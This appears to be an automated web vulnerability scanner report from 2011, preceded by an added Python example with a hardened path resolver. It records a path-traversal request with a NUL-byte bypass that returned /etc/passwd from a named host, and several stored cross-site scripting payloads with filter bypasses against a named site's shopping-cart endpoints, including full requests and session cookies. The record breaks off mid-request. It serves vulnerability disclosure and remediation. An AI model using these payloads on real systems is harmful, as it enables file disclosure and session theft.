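The payload in this finding combines two tricks: the ../ sequences walk out of the module directory, and the %00 (a NUL byte once decoded) truncates the path when it reaches a C-string file API, discarding whatever suffix the application appends. The following is an added worked example, not the site's PHP; it is written in Python. The module directory, the appended ".php" suffix and the function names are assumptions, and the legacy resolver is an emulation of the mechanism, not the site's code. The hardened resolver applies the standard defences: reject NUL bytes, optionally enforce an allow-list, canonicalise through the filesystem API, and require the result to remain under the base directory.

```python
import os
from urllib.parse import unquote

# Assumed layout: modules live under BASE and the app appends SUFFIX. Neither
# the directory nor the suffix is given in the report; both are illustrative.
BASE = "/srv/app/modules"
SUFFIX = ".php"

def legacy_resolve(m_name):
    """Emulates the failure the response above demonstrates: the decoded value
    is concatenated into a path, the NUL from %00 truncates that path when it
    reaches a C-string file API (dropping the appended suffix), and the '..'
    segments are collapsed textually. Emulation, not the site's code."""
    raw = unquote(m_name)
    built = os.path.join(BASE, raw) + SUFFIX
    truncated = built.split("\x00", 1)[0]
    return os.path.normpath(truncated)

def safe_resolve(m_name, allowed=None):
    """Hardened version: reject NUL bytes, optionally enforce an allow-list,
    then canonicalise with the filesystem API and require the result to stay
    under BASE. An absolute m_name makes os.path.join discard BASE, which the
    prefix check also catches. Raises ValueError on any violation."""
    raw = unquote(m_name)
    if "\x00" in raw:
        raise ValueError("NUL byte in module name")
    if allowed is not None and raw not in allowed:
        raise ValueError("module name not in allow-list")
    base = os.path.realpath(BASE)
    candidate = os.path.realpath(os.path.join(base, raw) + SUFFIX)
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the module directory")
    return candidate

def accepts(m_name, allowed=None):
    """Boolean wrapper around safe_resolve for quick checks."""
    try:
        safe_resolve(m_name, allowed)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    payload = "viewAdJ../../../../../../../../etc/passwd%00viewAdJ"
    print("legacy:", legacy_resolve(payload))     # the file the server returned
    print("safe:  ", accepts(payload), accepts("viewAdJ"))
```

The allow-list is the strongest of the three checks and should be used whenever the set of modules is known; the canonical-prefix check is the backstop for names that legitimately contain separators.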

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJ../../../../../../../../etc/passwd%00viewAdJ HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; __utmb=234602824; qcsegs=D,T

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Thu, 21 Apr 2011 01:25:48 GMT
Content-Length: 2011
Connection: close

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. Cross-site scripting (stored)
There are 6 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: validating input as strictly as possible on arrival, and HTML-encoding user-controllable data at every point where it is copied into a response.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.reputation.com/itemAdded [entityId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /itemAdded

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks at the URL /itemAdded. The payload fdf63"><script>alert(1)</script>80868d6c85b was submitted in the entityId parameter. This input was returned unmodified in a subsequent request for the URL /itemAdded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=fdf63"><script>alert(1)</script>80868d6c85b HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /itemAdded?bundleAdded=1862 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; __utmv=; repdef_ref_code=RCPT2; _bizo_cksm_crc32=18E06BDE; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.10.7.1303227203968

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 15:55:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 15:55:51 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 570411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<select name="switchPlan[fdf63"><script>alert(1)</script>80868d6c85b][3594]" id="promoscaleSelect_3594" entityId="fdf63">
...[SNIP]...

3.2. http://www.reputation.com/itemAdded [entityId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /itemAdded

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks at the URL /itemAdded. The payload af3ef"><script>alert(1)</script>03fec696ae4 was submitted in the entityId parameter. This input was returned unmodified in a subsequent request for the URL /itemAdded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=af3ef"><script>alert(1)</script>03fec696ae4 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /itemAdded?bundleAdded=1862 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; __utmv=; repdef_ref_code=RCPT2; _bizo_cksm_crc32=18E06BDE; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.10.7.1303227203968

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 15:40:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 15:40:44 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 127921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<select name="switchPlan[af3ef"><script>alert(1)</script>03fec696ae4][3594]" id="promoscaleSelect_3594" entityId="af3ef">
...[SNIP]...

3.3. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/ajax_updateShoppingCart.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the HTML document as plain text between tags at the URL /services/ajax_updateShoppingCart.php. The payload 93b60<x%20style%3dx%3aexpression(alert(1))>b4c28804027 was submitted in the entityId parameter. This input was returned as 93b60<x style=x:expression(alert(1))>b4c28804027 in a subsequent request for the URL /services/ajax_updateShoppingCart.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=93b60<x%20style%3dx%3aexpression(alert(1))>b4c28804027 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /services/ajax_updateShoppingCart.php HTTP/1.1
Host: www.reputation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan)
Connection: close
Cookie: region=USA; abg_products/default6_d=products%2Fdefault6_e; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A3%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A3%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A3; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmv=; abglink_repdef_table_test=default; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; lang=en; country=USA%2C69.54.6.26; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=18E06BDE; retargeter=generic; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; PHPSESSID=erpgsq3t7f3s77fo4055upbap3; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; repdef_ref_code=RCPT2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; uuid=4dada9a870f2b; __utmc=1; __utmb=1.19.9.1303227765506;

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 17:02:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 17:02:50 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 7781
Connection: close
Content-Type: text/html; charset=UTF-8

{"totalPrice":2637180,"isCartEmpty":false,"cartItems":{"0":{"bundles":[1862]},"3728a9cb87876df5a8e32444":{"bundles":[1862]},"de439\"><a>4789549632d":{"bundles":[1862]},"af3ef\"><script>alert(1)<\/scri
...[SNIP]...
<a>9112a538db":{"bundles":[1862]},"93b60<x style=x:expression(alert(1))>b4c28804027":{"bundles":[1862]}},"entities":[]}

3.4. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/ajax_updateShoppingCart.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/panelrenderer.php is copied into the HTML document as plain text between tags at the URL /services/ajax_updateShoppingCart.php. The payload d595f<img%20src%3da%20onerror%3dalert(1)>d75c8d6b1c5 was submitted in the entityId parameter. This input was returned as d595f<img src=a onerror=alert(1)>d75c8d6b1c5 in a subsequent request for the URL /services/ajax_updateShoppingCart.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=d595f<img%20src%3da%20onerror%3dalert(1)>d75c8d6b1c5&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Request 2

GET /services/ajax_updateShoppingCart.php?method=addPlan&planId=2800&entityId=0 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_np_stats=753%3D146%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A3%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A3%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A3; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.32.4.1303178015591

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:58:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 01:58:16 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 155
Content-Type: text/html; charset=UTF-8

{"totalPrice":27840,"isCartEmpty":false,"cartItems":{"0":{"plans":[2800]},"d595f<img src=a onerror=alert(1)>d75c8d6b1c5":{"bundles":[1862]}},"entities":[]}

3.5. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/ajax_updateShoppingCart.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the HTML document as plain text between tags at the URL /services/ajax_updateShoppingCart.php. The payload 10dae<img%20src%3da%20onerror%3dalert(1)>2f4934042d5 was submitted in the entityId parameter. This input was returned as 10dae<img src=a onerror=alert(1)>2f4934042d5 in a subsequent request for the URL /services/ajax_updateShoppingCart.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=10dae<img%20src%3da%20onerror%3dalert(1)>2f4934042d5 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=0 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
